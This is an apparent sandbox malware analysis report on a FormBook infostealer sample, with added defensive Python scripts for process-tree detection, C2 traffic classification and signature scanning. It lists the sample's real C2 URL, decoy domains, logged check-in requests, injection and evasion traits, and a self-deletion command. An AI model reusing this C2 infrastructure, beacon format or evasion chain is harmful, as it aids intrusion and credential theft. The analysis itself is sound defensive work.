

Analysis Report: Design Template.exe

Overview

General Information

Sample Name: Design Template.exe
Analysis ID: 385453
MD5: 56d56566623a2bc942141b56f9dd3da5
SHA1: bc76bd9c064a7df36b84d5e08f266c8d4d9819ee
SHA256: 5397f0168be76c7e5efee936d341eb359b9015af5e77631129dc0664105e9259
Tags: exe

Detection

Family: Osiris, FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Osiris Trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Design Template.exe (PID: 3260 cmdline: 'C:\Users\user\Desktop\Design Template.exe' MD5: 56D56566623A2BC942141B56F9DD3DA5)
    • Design Template.exe (PID: 6300 cmdline: C:\Users\user\Desktop\Design Template.exe MD5: 56D56566623A2BC942141B56F9DD3DA5)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6908 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 7036 cmdline: /c del 'C:\Users\user\Desktop\Design Template.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
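The tree above is the FormBook execution chain: the sample starts a second copy of its own image (PID 3260 -> 6300), code is injected into the already-running explorer.exe (which is why the report draws it under PID 6300), the injected explorer.exe starts a 32-bit rundll32.exe from SysWOW64 with no DLL argument, and that process runs cmd.exe /c del against the original file. None of this tripped a Sigma rule in the report. The Python below is an added example, not part of the Joe Sandbox report: it runs three process-creation checks over constructed Sysmon-style events built from the PIDs, image paths and command lines shown above. The parent PID 4000 (for the first process and for explorer.exe) and the SysWOW64 path of cmd.exe are constructed, since the report does not give them.

```python
"""Process-tree checks for the FormBook execution chain seen in this report.

Added example, not part of the Joe Sandbox report. EVENTS is a constructed
Sysmon-style process-creation log built from the PIDs, image paths and command
lines in the Startup section; parent PID 4000 and the SysWOW64 path of cmd.exe
are constructed because the report does not give them.
"""
import re

EVENTS = [
    {"pid": 3260, "ppid": 4000, "image": r"C:\Users\user\Desktop\Design Template.exe",
     "cmdline": "'C:\\Users\\user\\Desktop\\Design Template.exe'"},
    {"pid": 6300, "ppid": 3260, "image": r"C:\Users\user\Desktop\Design Template.exe",
     "cmdline": r"C:\Users\user\Desktop\Design Template.exe"},
    # explorer.exe is drawn under PID 6300 in the report because code was injected
    # into it; in a real log its parent is the logon process, not the sample.
    {"pid": 3292, "ppid": 4000, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 6908, "ppid": 3292, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"C:\Windows\SysWOW64\rundll32.exe"},
    {"pid": 7036, "ppid": 6908, "image": r"C:\Windows\SysWOW64\cmd.exe",  # path constructed
     "cmdline": "/c del 'C:\\Users\\user\\Desktop\\Design Template.exe'"},
    {"pid": 7052, "ppid": 7036, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# rundll32.exe followed by at least one argument (the DLL[,entry] it should load)
RUNDLL_ARG = re.compile(r'rundll32(?:\.exe)?"?\s+\S', re.IGNORECASE)
# "del <target>" at the end of a cmd.exe command line, quotes optional
DEL_TARGET = re.compile(r"""\bdel\b\s+['"]?([^'"]+?)['"]?\s*$""", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_self_relaunch(ev: dict, by_pid: dict) -> bool:
    """A process whose image is identical to its parent's: the sample starts a
    second copy of itself, the usual prelude to hollowing it out."""
    parent = by_pid.get(ev["ppid"])
    return parent is not None and parent["image"].lower() == ev["image"].lower()


def rule_rundll32_without_dll(ev: dict) -> bool:
    """rundll32.exe started with no DLL to load does nothing legitimate; here it
    is an empty host process for injected code."""
    if basename(ev["image"]) != "rundll32.exe":
        return False
    return not RUNDLL_ARG.search(ev["cmdline"])


def rule_deletes_running_image(ev: dict, events: list):
    """cmd.exe /c del <path> where <path> is the image of another logged
    process: the payload removing the file it was launched from."""
    if basename(ev["image"]) != "cmd.exe":
        return None
    m = DEL_TARGET.search(ev["cmdline"])
    if not m:
        return None
    target = m.group(1).strip().lower()
    victims = [e["pid"] for e in events if e["image"].lower() == target]
    return victims or None


def evaluate(events: list = EVENTS) -> list:
    """Run all three checks and return one finding per hit, in event order."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if rule_self_relaunch(ev, by_pid):
            findings.append({"pid": ev["pid"], "rule": "self_relaunch"})
        if rule_rundll32_without_dll(ev):
            parent = by_pid.get(ev["ppid"])
            findings.append({"pid": ev["pid"], "rule": "rundll32_without_dll",
                             "parent": basename(parent["image"]) if parent else None})
        victims = rule_deletes_running_image(ev, events)
        if victims:
            findings.append({"pid": ev["pid"], "rule": "cmd_deletes_running_image",
                             "victims": victims})
    return findings


if __name__ == "__main__":
    for finding in evaluate():
        print(finding)
```

The rundll32 check is deliberately independent of the parent: explorer.exe as the parent of an argument-less rundll32.exe is what this sample produces, but the finding records the parent rather than requiring it, so the rule still fires when the injected host process is something other than explorer.exe.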

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.zq2003.com/ma3c/"], "decoy": ["bensimonconstructions.com", "margaretta.info", "getreireply.com", "jamierighetti.com", "gxjljc.com", "internet-exerzitien.com", "appetiteintelligence.com", "buscar-id-apple.com", "unique-bikinis.com", "enclassique.com", "dafontonline.com", "northamericancarbonexchange.com", "yashasvsaluja.com", "sn-international.com", "humanvitality.site", "sarahcasias.com", "xn--vrv276h3cb.com", "curiget.xyz", "anxietyattackscure.com", "angelstonecrystals.com", "onestripemed.com", "mirgran.com", "boxtechtv.com", "healthcontrol.net", "eroutescheduling.com", "betralifcannabis.com", "advancefulfillmentcenter.net", "graphicprofessor.com", "booster-tresorerie.com", "intibeso.xyz", "modomo.amsterdam", "rionaluo.net", "6streeam.xyz", "mobundlesco.com", "sacredlight.store", "xy4869.com", "xn--casamio-9za.com", "herma-shop.com", "cfphoenixmembers.com", "ssrpss.info", "realunitystudio.com", "itsjustinscode.com", "wannabebody.com", "bwbcoa.com", "unitednations-office.com", "dallasmalerevuetix.com", "bestflowersandgifts.com", "lojasmegamoveis.com", "fyahvapes.com", "salvofoods.com", "meditationwithdaniel.com", "2elden.com", "romitoart.com", "sci-mfg.com", "xn--hy1bw5cd1ic1e75g84omki.com", "erwinsiahaan.com", "landreclaim.com", "chuanyangwenhua.com", "zzfuwusheji.com", "cannabiss.clinic", "sexichef.com", "aymauxilia.com", "conchcruiserswestpalm.com", "rememberingedward.info"]}
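The configuration lists one C2 URL and 64 decoy domains; the GET requests logged under Networking below share the path /ma3c/ and the two parameter names _h0PX and nflpdH across the real C2 and the decoys. The following Python script is an added worked example, not part of the Joe Sandbox report: it parses the extracted configuration and classifies captured requests against it. The request lines and Host values are copied from the report (the decoy list is reduced to the hosts that were actually contacted, and the final www.example.com request is constructed to exercise the "unknown" branch). Stripping a leading "www." before comparing hosts is my reading of the report, where the configured host zq2003.com and the bare decoy names all appear with a "www." prefix on the wire.

```python
"""Classify observed HTTP requests against an extracted FormBook configuration.

Added example, not part of the Joe Sandbox report. The configuration values and
the request lines are copied from the report; the parsing and classification
logic is mine.
"""
import json
from urllib.parse import parse_qs, urlsplit

# Configuration as extracted in the report, reduced to the decoys that received traffic.
CONFIG_JSON = json.dumps({
    "C2 list": ["www.zq2003.com/ma3c/"],
    "decoy": ["betralifcannabis.com", "2elden.com", "landreclaim.com",
              "rememberingedward.info", "chuanyangwenhua.com",
              "bestflowersandgifts.com", "sci-mfg.com", "sexichef.com"],
})

# Constructed sample input: (request line, Host header) pairs as logged in the
# report's Networking section. The last pair is made up to show the "unknown" branch.
OBSERVED = [
    ("GET /ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx HTTP/1.1", "www.zq2003.com"),
    ("GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== HTTP/1.1", "www.betralifcannabis.com"),
    ("GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== HTTP/1.1", "www.2elden.com"),
    ("GET /ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx HTTP/1.1", "www.landreclaim.com"),
    ("GET /index.html HTTP/1.1", "www.example.com"),  # constructed, not from the report
]


def normalize_host(host: str) -> str:
    """Lower-case and drop a leading 'www.', which FormBook prepends at run time."""
    host = host.strip().lower()
    return host[4:] if host.startswith("www.") else host


def load_config(text: str) -> dict:
    """Split each C2 entry into host and path; decoys are bare host names."""
    cfg = json.loads(text)
    c2 = {}
    for entry in cfg.get("C2 list", []):
        host, _, path = entry.partition("/")
        c2[normalize_host(host)] = "/" + path
    decoys = {normalize_host(d) for d in cfg.get("decoy", [])}
    return {"c2": c2, "decoy": decoys}


def classify(request_line: str, host: str, cfg: dict) -> dict:
    """Label one request as c2, decoy or unknown and record its path and parameter names."""
    method, target, _ = request_line.split(" ", 2)
    parts = urlsplit(target)
    params = sorted(parse_qs(parts.query, keep_blank_values=True))
    h = normalize_host(host)
    if h in cfg["c2"]:
        kind = "c2" if parts.path == cfg["c2"][h] else "c2-host-other-path"
    elif h in cfg["decoy"]:
        kind = "decoy"
    else:
        kind = "unknown"
    return {"host": h, "path": parts.path, "params": params, "kind": kind, "method": method}


def beacon_pivot(results: list) -> dict:
    """Group requests by (path, parameter names). A FormBook check-in reuses the
    campaign path and the same parameter names for the C2 and every decoy, so
    the group that contains the real C2 also lists every decoy contact."""
    groups = {}
    for r in results:
        key = (r["path"], tuple(r["params"]))
        groups.setdefault(key, []).append(r["host"])
    c2_keys = {(r["path"], tuple(r["params"])) for r in results if r["kind"] == "c2"}
    return {key: hosts for key, hosts in groups.items() if key in c2_keys}


def analyse(config_text: str = CONFIG_JSON, observed: list = OBSERVED) -> dict:
    cfg = load_config(config_text)
    results = [classify(line, host, cfg) for line, host in observed]
    return {"results": results, "pivot": beacon_pivot(results)}


if __name__ == "__main__":
    out = analyse()
    for r in out["results"]:
        print(f'{r["kind"]:8} {r["host"]:28} {r["path"]} {r["params"]}')
    print("beacon groups containing the C2:", out["pivot"])
```

The pivot is the useful output for triage: the decoy hosts are legitimate domains and will not appear on any blocklist, so the shared path and parameter names, not the host, are what tie the decoy traffic to the check-in.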

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings

C:\Users\user\AppData\Local\Temp\Liebert.bmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
C:\Users\user\AppData\Local\Temp\Liebert.bmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  ($sequence_0 decodes to add ecx,eax; rdtsc; sub eax,ecx; mov [ebp-4],eax: the timestamp-counter delta behind "Tries to detect virtualization through RDTSC time measurements" in the signature list.)
C:\Users\user\AppData\Local\Temp\Liebert.bmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C

Memory Dumps

Source | Rule | Description | Author | Strings

00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further memory-dump entries are not reproduced in this extract.)
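The JPCERT/CC rule matched the same three five-byte strings in the dropped Liebert.bmp and in the memory dumps. Each is an x86 push imm32 (opcode 68) carrying a 32-bit constant, which is how FormBook pushes a hashed API name before resolving it; the rule's string names say which sqlite3 export each hash stands for (the credential-store readers sqlite3_step, sqlite3_column_text and sqlite3_column_blob). The Python below is an added example, not part of the report or of the JPCERT/CC rule: it scans a buffer for those strings, reports offsets the way the table above does, and decodes the pushed constants. The sample buffer is constructed so the script runs offline; that the rule's condition requires all three strings is my assumption (all three matched in every listed source).

```python
"""Scan a dump or dropped file for the three FormBook push-imm32 signatures
the JPCERT/CC rule matched in this report.

Added example, not part of the report or the rule. The byte patterns are the
rule strings shown in the Yara tables; the scanner, the push-imm32 decoding and
the sample buffer are mine.
"""
import struct

SIGNATURES = {
    "$sqlite3step": bytes.fromhex("68341C7BE1"),
    "$sqlite3text": bytes.fromhex("68382A90C5"),
    "$sqlite3blob": bytes.fromhex("6853D87F8C"),
}


def decode_push_imm32(pattern: bytes) -> int:
    """Opcode 0x68 (PUSH imm32) followed by a little-endian 32-bit constant:
    the API-name hash FormBook pushes before its resolver call."""
    if len(pattern) != 5 or pattern[0] != 0x68:
        raise ValueError("not a push imm32 encoding")
    return struct.unpack("<I", pattern[1:])[0]


def find_all(buf: bytes, needle: bytes) -> list:
    """Every offset of needle in buf, overlapping matches included."""
    hits, start = [], 0
    while True:
        i = buf.find(needle, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def scan(buf: bytes, require_all: bool = True) -> dict:
    """Return {name: [offsets]} plus a verdict; require_all mirrors an
    'all of them' condition (assumed for the JPCERT/CC rule)."""
    hits = {name: find_all(buf, pat) for name, pat in SIGNATURES.items()}
    matched = all(hits.values()) if require_all else any(hits.values())
    return {"hits": hits, "matched": matched}


def build_sample() -> bytes:
    """Constructed buffer: NOP filler with the three pushes placed at chosen
    offsets, $sqlite3step twice as in the report's tables."""
    buf = bytearray(b"\x90" * 0x200)
    for off, name in ((0x40, "$sqlite3step"), (0x80, "$sqlite3text"),
                      (0xC0, "$sqlite3blob"), (0x100, "$sqlite3step")):
        buf[off:off + 5] = SIGNATURES[name]
    return bytes(buf)


def scan_file(path: str) -> dict:
    """Scan a real artefact, e.g. Liebert.bmp or an .sdmp dump from the report."""
    with open(path, "rb") as fh:
        return scan(fh.read())


if __name__ == "__main__":
    for name, pat in SIGNATURES.items():
        print(f"{name}: push 0x{decode_push_imm32(pat):08X}")
    result = scan(build_sample())
    for name, offsets in result["hits"].items():
        print(name, [hex(o) for o in offsets])
    print("matched:", result["matched"])
```

Because the strings are immediate operands rather than imported names, they survive the packing and the "PE file does not import any functions" state noted in the signature list; a scan of the unpacked dump is what finds them, which is why the report lists the rule as a memory-scan rule.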

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Design Template.exe, Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Found malware configuration
Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (the C2 list and decoy list reproduced under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Design Template.exe, VirusTotal: Detection: 34%
Yara detected FormBook
Source: Yara match, file source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, file source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Design Template.exe, Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 14.2.rundll32.exe.7b4cd8.1.unpack, Avira: Label: TR/Patched.Gen
Source: 14.2.rundll32.exe.4997960.5.unpack, Avira: Label: TR/Patched.Gen
Uses 32bit PE files
Source: Design Template.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP, source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP, source: Design Template.exe, 00000004.00000002.329265577.0000000000AFF000.00000040.00000001.sdmp; rundll32.exe, 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: Design Template.exe, rundll32.exe
Source: Binary string: rundll32.pdb, source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL, source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb, source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
(The wntdll.pdb and rundll32.pdb strings inside the Design Template.exe process are the mapped ntdll and rundll32 images the sample stages for injection, not debug information of the sample itself.)
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4x nop then pop ebx, 14_2_004F6A98
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4x nop then pop edi, 14_2_005062A3
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4x nop then pop edi, 14_2_004FC3B1
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4x nop then pop edi, 14_2_00505672

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.zq2003.com/ma3c/
Source: global traffic, HTTP traffic detected: GET /ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx HTTP/1.1 | Host: www.zq2003.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== HTTP/1.1 | Host: www.betralifcannabis.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== HTTP/1.1 | Host: www.2elden.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx HTTP/1.1 | Host: www.landreclaim.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== HTTP/1.1 | Host: www.rememberingedward.info | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx HTTP/1.1 | Host: www.chuanyangwenhua.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== HTTP/1.1 | Host: www.bestflowersandgifts.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== HTTP/1.1 | Host: www.sci-mfg.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== HTTP/1.1 | Host: www.sexichef.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
(Only the first request goes to the configured C2; the other eight hosts are decoys from the configuration. All nine share the path /ma3c/ and the parameter names _h0PX and nflpdH, so the path and parameter names, not the host, are the stable indicator.)
IP address seen in connection with other malware
Source: Joe Sandbox View, IP Address: 160.153.136.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View, ASN Name: OVHFR
Source: Joe Sandbox View, ASN Name: GODADDY-AMSDE
Source: Joe Sandbox View, ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS
HTTP GET or POST without a user agent
Source: global traffic, the same nine GET requests listed above (www.zq2003.com and the eight decoy hosts); none of them carries a User-Agent header.
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp, string found in binary or memory: <a href="https://www.facebook.com/OnlyDomains" target="_blank" rel="nofollow" title="OnlyDomains Facebook"><i class="fa fa-facebook"></i></a> equals www.facebook.com (Facebook)
Source: unknown, DNS traffic detected: queries for: www.modomo.amsterdam
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 12 Apr 2021 12:42:39 GMT | Server: Apache/2.4.46 (Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9a | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp, strings found in binary or memory: http://fontfabrik.com, http://www.apache.org/licenses/LICENSE-2.0, http://www.carterandcone.coml, http://www.fontbureau.com, http://www.fontbureau.com/designers, http://www.fontbureau.com/designers/?, http://www.fontbureau.com/designers/cabarga.htmlN, http://www.fontbureau.com/designers/frere-jones.html, http://www.fontbureau.com/designers8, http://www.fontbureau.com/designers?, http://www.fontbureau.com/designersG, http://www.fonts.com, http://www.founder.com.cn/cn, http://www.founder.com.cn/cn/bThe, http://www.founder.com.cn/cn/cThe, http://www.galapagosdesign.com/DPlease, http://www.galapagosdesign.com/staff/dennis.htm, http://www.goodfont.co.kr, http://www.jiyu-kobo.co.jp/, http://www.sajatypeworks.com, http://www.sakkal.com, http://www.sandoll.co.kr, http://www.tiro.com, http://www.typography.netD, http://www.urwpp.deDPlease, http://www.zhongyicts.com.cn (vendor URLs from font metadata loaded by explorer.exe, not attacker infrastructure)
Source: explorer.exe, 00000007.00000000.308827375.000000000ECFB000.00000004.00000001.sdmp, strings found in binary or memory: http://schemas.mi, http://schemas.micr
Source: explorer.exe, 00000007.00000000.298632353.0000000006870000.00000004.00000001.sdmp, string found in binary or memory: http://www.autoitscript.com/autoit3/J
